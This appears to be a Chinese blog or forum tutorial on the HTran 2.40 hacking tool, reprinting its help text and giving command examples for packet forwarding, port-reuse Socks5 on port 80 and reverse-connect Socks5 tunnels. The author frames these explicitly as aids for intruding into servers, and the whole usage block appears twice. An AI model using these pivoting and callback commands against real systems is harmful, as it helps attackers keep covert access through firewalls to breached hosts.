HTRAN 2.4终极使用
Htran 用得比较多,但是没注意更新,今天终于发现了个 2.4的HTRAN。 多线程包转发 + Socks5 + 端口重用Socks5 + 反连Socks5 完美版 HTran V2.40 V2.40 功能介绍: 1. 修改代理转发核心超时设置为10分钟。
2. 改进了反连Socks5与Listen连接的稳定性。使用示例:
E:\HackTolls>htran -h
============= HUC Packet & Socks5 Transmit Tool V2.40 (2005-01-08) ===========
=============== Code by lion, Welcome to http://www.cnhonker.com =============[Usage:]
-install Install Service //安装服务,默认是8009端口
-remove Remove Service //移去服务
-start Start Service //启动服务
-stop Stop Service //停止服务[Usage of Function:]
-c Config Parameter //配置参数
-p Packet Transmit //包转发
-s Socks5 Proxy //Socks5代理
E:\HackTolls>htran -c -h[Usage of Config:] //这个就不说了,简单,自己看
-c -show
-c -type <0,1,2> <0.BindPort 1.ConnectBack 2.Listen>
-c -bind [ReBindIP] <BindPort>
-c -connect <ConnectHost> <ConnectPort>
-c -listen <ConnectPort> <ListenPort>
E:\HackTolls>htran -p -h //这个用得比较多[Usage of Packet Transmit:]
-p -listen ConnectPort TransmitPort //本地监听转发
-p -tran ConnectPort TransmitHost TransmitPort //转发到远程主机
-p -slave ConnectHost ConnectPort TransmitHost TransmitPort //反向连接转发[Option:]
-log logfile //记录日志
E:\HackTolls>htran -s -h[Usage of Socks5 Proxy:]
-s -bind [ReBindIP] [BindPort] Default:ALL 8009
// 端口重用Socks5:
// htran -s -bind 外网IP或者非保留IP 80
// 注: 这里的IP不要使用127.0.0.1, 而应该使用一个网卡接口的IP。
这个在入侵只有80端口的服务器的很有用的。
用法演示:这里我们不写绑定IP,就是指本机的所有可用IP。
用SOCKCAP连接本机IP:218.199.188.72端口:8888,打开IE代理可以看到:
图1:
反连Socks5示例:
-s -connect ConnectHost [ConnectPort] Default:80
在你接受反连的那台机器运行:
比如: htran -s -listen 80 8009
然后在反连那台机器运行:
-s -listen [ConnectPort] [ListenPort] Default:80 8009
htran -s -connect 接受反连IP 80
如: htran -s -connect 10.10.10.222 80 使用SocksCap之类的连接接受反连IP机器的ListenPort即可。
上例为8009这个很简单不截图了。
2. 改进了反连Socks5与Listen连接的稳定性。使用示例:
E:\HackTolls>htran -h
============= HUC Packet & Socks5 Transmit Tool V2.40 (2005-01-08) ===========
=============== Code by lion, Welcome to http://www.cnhonker.com =============[Usage:]
-install Install Service //安装服务,默认是8009端口
-remove Remove Service //移去服务
-start Start Service //启动服务
-stop Stop Service //停止服务[Usage of Function:]
-c Config Parameter //配置参数
-p Packet Transmit //包转发
-s Socks5 Proxy //Socks5代理
E:\HackTolls>htran -c -h[Usage of Config:] //这个就不说了,简单,自己看
-c -show
-c -type <0,1,2> <0.BindPort 1.ConnectBack 2.Listen>
-c -bind [ReBindIP] <BindPort>
-c -connect <ConnectHost> <ConnectPort>
-c -listen <ConnectPort> <ListenPort>
E:\HackTolls>htran -p -h //这个用得比较多[Usage of Packet Transmit:]
-p -listen ConnectPort TransmitPort //本地监听转发
-p -tran ConnectPort TransmitHost TransmitPort //转发到远程主机
-p -slave ConnectHost ConnectPort TransmitHost TransmitPort //反向连接转发[Option:]
-log logfile //记录日志
E:\HackTolls>htran -s -h[Usage of Socks5 Proxy:]
-s -bind [ReBindIP] [BindPort] Default:ALL 8009
// 端口重用Socks5:
// htran -s -bind 外网IP或者非保留IP 80
// 注: 这里的IP不要使用127.0.0.1, 而应该使用一个网卡接口的IP。
这个在入侵只有80端口的服务器的很有用的。
用法演示:这里我们不写绑定IP,就是指本机的所有可用IP。
用SOCKCAP连接本机IP:218.199.188.72端口:8888,打开IE代理可以看到:
图1:
反连Socks5示例:
-s -connect ConnectHost [ConnectPort] Default:80
在你接受反连的那台机器运行:
比如: htran -s -listen 80 8009
然后在反连那台机器运行:
-s -listen [ConnectPort] [ListenPort] Default:80 8009
htran -s -connect 接受反连IP 80
如: htran -s -connect 10.10.10.222 80 使用SocksCap之类的连接接受反连IP机器的ListenPort即可。
上例为8009这个很简单不截图了。